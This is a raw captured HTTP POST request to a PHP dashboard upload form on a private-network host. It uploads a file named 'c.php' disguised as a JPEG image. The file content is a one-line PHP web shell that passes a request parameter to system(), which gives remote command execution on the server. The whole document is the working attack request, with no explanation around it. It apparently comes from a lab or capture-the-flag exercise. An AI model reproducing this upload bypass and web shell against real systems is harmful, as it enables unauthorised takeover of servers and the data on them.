POST /dashboard.php?PHPSESSID=97hca4hurd2jveu9pubiuo4331 HTTP/1.1
Host: 10.0.1.21
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.21/dashboard.php?PHPSESSID=97hca4hurd2jveu9pubiuo4331
Content-Type: multipart/form-data; boundary=---------------------------17150442413427579601423744755
Content-Length: 500
Cookie: PHPSESSID=97hca4hurd2jveu9pubiuo4331
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------17150442413427579601423744755
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------17150442413427579601423744755
Content-Disposition: form-data; name="uploaded"; filename="c.php"
Content-Type: image/jpeg

<?php echo system($_REQUEST['haco']); ?>
-----------------------------17150442413427579601423744755
Content-Disposition: form-data; name="Upload"

Upload
-----------------------------17150442413427579601423744755--
======================================================================
